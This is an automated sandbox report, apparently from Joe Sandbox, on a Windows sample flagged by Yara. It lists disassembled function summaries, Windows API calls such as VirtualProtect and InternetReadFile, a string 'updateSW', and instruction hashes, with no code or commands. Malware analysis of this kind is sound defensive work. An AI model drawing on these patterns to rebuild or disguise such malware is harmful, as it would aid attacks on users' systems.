                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00E82C5F
                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00E82C74
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00E82C82
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00E82C9D
                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00E82CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 2509773233-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                    • String ID:
                                                                    • API String ID: 3136044242-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E97260
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E97272
                                                                    • _free.LIBCMT ref: 00E97284
                                                                    • _free.LIBCMT ref: 00E97296
                                                                    • _free.LIBCMT ref: 00E972A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00416FF9
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 0041700B
                                                                    • _free.LIBCMT ref: 0041701D
                                                                    • _free.LIBCMT ref: 0041702F
                                                                    • _free.LIBCMT ref: 00417041
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O*$rB$rB
                                                                    • API String ID: 0-546290271
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E851B2
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    • Sleep.KERNEL32(000007D0), ref: 00E8552A
                                                                    • Sleep.KERNEL32(000007D0), ref: 00E85544
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                                    • String ID: updateSW
                                                                    • API String ID: 500923978-2484434887
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    APIs
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00E81B6C
                                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00E81B8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileInternet$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3197321146-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    APIs
                                                                      • Part of subcall function 00E8FE6F: _free.LIBCMT ref: 00E8FE7D
                                                                      • Part of subcall function 00E9375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00E988CA,?,?,?,00000000,?,00E98639,0000FDE9,00000000,?), ref: 00E93800
                                                                    • GetLastError.KERNEL32 ref: 00E95D18
                                                                    • __dosmaperr.LIBCMT ref: 00E95D1F
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E95D5E
                                                                    • __dosmaperr.LIBCMT ref: 00E95D65
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                    • String ID:
                                                                    • API String ID: 167067550-0
                                                                    APIs
                                                                      • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                                      • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                                    • GetLastError.KERNEL32 ref: 00415AB1
                                                                    • __dosmaperr.LIBCMT ref: 00415AB8
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                                    • __dosmaperr.LIBCMT ref: 00415AFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                    • String ID:
                                                                    • API String ID: 167067550-0
                                                                    • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                    • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                                    • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                    • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                                    APIs
                                                                      • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                                    • GetLastError.KERNEL32 ref: 10007C36
                                                                    • __dosmaperr.LIBCMT ref: 10007C3D
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                                    • __dosmaperr.LIBCMT ref: 10007C83
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                    • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                                    • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                    • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                    • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                                    • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                    • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction ID: 27459168c497e94a82b8ae262e9544a202b9925d8764133dd3c69d93dd75e736
                                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction Fuzzy Hash: 3921E771E01223ABCF319B249C84B9E7768AF52BE4F2525A1FD16B7290D630DC01C6E4
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00E8213F,?,00E82143,00E8C610,?,00E8213F,0041D0A0,?,00E91714,00000000,0041D0A0,00000000,00000000,00E8213F), ref: 00E91469
                                                                    • _free.LIBCMT ref: 00E914C6
                                                                    • _free.LIBCMT ref: 00E914FC
                                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E91714,00000000,0041D0A0,00000000,00000000,00E8213F), ref: 00E91507
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                    • Instruction ID: 082e578335d1c86adf61668380d17cae181f920845b80840df14350165fbe028
                                                                    • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                    • Instruction Fuzzy Hash: D21129327002073BDF2123B45D86D7A26D98BC4379F6536B8F638B61E2DF258C119115
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,74DEDF80,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 00411202
                                                                    • _free.LIBCMT ref: 0041125F
                                                                    • _free.LIBCMT ref: 00411295
                                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 004112A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                    • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                                    • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                    • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00E8C5A5,00E92748,?,?,00E8A3C2,?,?,?,00E81353,?,00E8370E,?,?), ref: 00E915C0
                                                                    • _free.LIBCMT ref: 00E9161D
                                                                    • _free.LIBCMT ref: 00E91653
                                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E8A3C2,?,?,?,00E81353,?,00E8370E,?,?,?), ref: 00E9165E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                    • Instruction ID: 09c329d56c63389975c5143b54f167817b5cd6dc4ddc51b69f610a41e3bd64d0
                                                                    • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                    • Instruction Fuzzy Hash: 28110832B042023BDF2227B96D86D7A26998BC1378F6633B9F524F21E2DF658C11A115
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                                    • _free.LIBCMT ref: 004113B6
                                                                    • _free.LIBCMT ref: 004113EC
                                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                    • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                                    • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                    • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E8C13F,?,?,0042B000,00000000,?,00E8C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 00E8C10E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction ID: 388013442dc53b1590f8325c4fb68bb087b49e3e230b81c00a208426b7407c52
                                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction Fuzzy Hash: 5611A731E41221EBDB226B689C8579A77A4AF077A4F355121FD1DB72C0D670ED0087F4
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000), ref: 00E9B0A0
                                                                    • GetLastError.KERNEL32(?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000,00000000,?,00E98863,?), ref: 00E9B0AC
                                                                      • Part of subcall function 00E9B072: CloseHandle.KERNEL32(0042A930,00E9B0BC,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000,00000000), ref: 00E9B082
                                                                    • ___initconout.LIBCMT ref: 00E9B0BC
                                                                      • Part of subcall function 00E9B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,00E9B063,00E9AD23,00000000,?,00E9830F,00000000,00000000,00000000,00000000), ref: 00E9B047
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000), ref: 00E9B0D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction ID: 816d2042dea4285ee948de37c6c093a3822e10da244b8e347f577633e8616e90
                                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction Fuzzy Hash: B8F01C36911214FBCF222F91ED0899E7F66EF487A4F054420FE1DA6130C7328961DB95
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                                    • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                                      • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                                    • ___initconout.LIBCMT ref: 0041AE55
                                                                      • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                                    • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                                      • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                                    • ___initconout.LIBCMT ref: 1000CD55
                                                                      • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                    • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                                    • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                    • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                                    • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                                    • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
